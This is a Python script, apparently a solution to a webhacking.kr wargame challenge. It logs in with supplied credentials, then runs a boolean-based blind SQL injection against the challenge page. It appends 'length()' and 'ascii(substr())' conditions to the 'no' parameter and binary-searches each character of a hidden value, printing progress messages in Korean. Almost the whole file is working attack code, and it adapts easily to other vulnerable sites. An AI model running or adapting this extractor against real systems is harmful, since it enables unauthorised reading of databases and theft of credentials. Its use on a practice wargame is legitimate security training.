import requests
import sys
def main():
if len(sys.argv) != 4:
print("useage : {Path} (url) (id) (pw) (param)".format(Path=sys.argv[0]))
return
id = str(sys.argv[1])
pw = str(sys.argv[2])
param = str(sys.argv[3])
query(login(id,pw),param)
def login(id, pw):
form = {'id':id,'pw':pw}
a = requests.post('http://webhacking.kr', data=form)
if(a.text.find("===========================================") != -1):
print("Login Fail !")
exit()
cookie = a.headers.get('set-cookie')
print('id : '+form['id']+'\tLogin Success !');
max = cookie.index('=',0)
cookies = {cookie[0:max]:cookie[max+1:]}
return cookies
def query(cookie, param):
result = ''
url = "http://webhacking.kr/challenge/bonus/bonus-1/index.php?no=2{query}&id=admin&pw"
querys = " and length({p})={0}"
length =0
print("글자 수 : ", end='')
for i in range(1,60):
query = url.format(query=querys.format(i, p=param))
h = requests.get(query, cookies=cookie)
h = h.text.lower()
if(h.find('true') != -1):
print(str(i))
length = i
break;
if(length is 0):
print("글자수 못찾음")
exit()
for i in range(1, length+1):
a_max = 125
a_min = 34
mid = 0
while(a_max > a_min):
mid = int( (a_max + a_min) / 2 )
querys = " and ascii(substr({p},{0},1))>={1}"
query = url.format(query=querys.format(i,mid,p=param))
h = requests.get(query, cookies=cookie)
h = h.text.lower()
if(h.find('true') != -1):
a_min = mid
else :
a_max = mid
if a_min == mid and mid+1 == a_max :
break;
result += chr(a_min)
print(chr(a_min),end='')
print("\nresult : {0}".format(result))
return
if __name__ == '__main__':
main()